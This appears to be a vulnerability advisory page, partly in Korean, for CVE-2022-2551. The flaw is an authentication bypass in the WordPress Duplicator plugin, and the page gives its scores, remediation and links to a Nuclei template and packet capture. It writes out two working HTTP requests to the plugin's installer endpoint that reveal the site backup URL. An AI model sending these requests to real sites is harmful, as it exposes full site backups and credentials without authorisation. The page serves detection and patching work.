🔙 목록으로 돌아가기

CVE-2022-2551: WordPress Duplicator <1.4.7 - Authentication Bypass

TitleWordPress Duplicator <1.4.7 - Authentication Bypass
AuthorLRTK-CODER
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site.
RemediationFixed in version 1.4.7.1.
CVSS Score7.5
EPSS Score0.64813
CVE IDCVE-2022-2551
CWE IDCWE-425
Tags cve2022 cve wordpress wp wp-plugin duplicator wpscan snapcreek vkev vuln

🔍 Vulnerability Description

WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.

🌐 HTTP Request

GET /wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-content/dup-installer/main.installer.php?is_daws=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2551.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2551.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A